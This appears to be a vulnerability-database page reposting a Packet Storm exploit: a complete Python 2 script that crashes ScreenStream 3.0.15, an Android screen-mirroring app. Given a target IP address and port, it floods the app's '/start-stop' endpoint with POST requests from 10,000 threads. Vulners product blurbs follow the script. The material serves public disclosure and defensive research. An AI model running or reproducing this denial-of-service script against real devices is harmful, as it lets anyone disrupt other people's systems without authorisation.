Lucene search
K

ScreenStream 3.0.15 Denial Of Service

🗓️ 21 Feb 2019 00:00:00Reported by Marcelo VazquezType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 42 Views

ScreenStream 3.0.15 Remote Denial of Service (DoS) in Android

Code
`#!/usr/bin/python  
#coding: utf-8  
  
# ************************************************************************  
# * Author: Marcelo VA!zquez (aka s4vitar) *  
# * ScreenStream 3.0.15 Remote Denial of Service (DoS) *  
# ************************************************************************  
  
# Exploit Title: ScreenStream 3.0.15 Remote Denial of Service (DoS)  
# Date: 2019-02-21  
# Exploit Author: Marcelo VA!zquez (aka s4vitar)  
# Vendor Homepage: http://mobzapp.com/mirroring/index.html  
# Software Link: https://play.google.com/store/apps/details?id=info.dvkr.screenstream&hl=en  
# Version: <= ScreenStream 3.0.15  
# Tested on: Android  
  
import sys, requests, threading, signal  
  
def handler(signum, frame):  
print '\nFinishing program...\n'  
sys.exit(0)  
  
if len(sys.argv) != 3:  
print "\nUsage: python " + sys.argv[0] + " <ip_address> <port>\n"  
print "Example: python " + sys.argv[0] + " 192.168.1.125 8080\n"  
sys.exit(0)  
  
def startAttack(url):  
url_destination = url + '/start-stop'  
headers = {'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.5', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'Accept': '*/*', 'Referer': url, 'Connection': 'close'}  
  
r = requests.post(url_destination, headers=headers)  
  
if __name__ == '__main__':  
  
signal.signal(signal.SIGINT, handler)  
url = 'http://' + sys.argv[1] + ':' + sys.argv[2]  
  
threads = []  
  
for i in xrange(0, 10000):  
t = threading.Thread(target=startAttack, args=(url,))  
threads.append(t)  
  
for x in threads:  
x.start()  
  
for x in threads:  
x.join()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation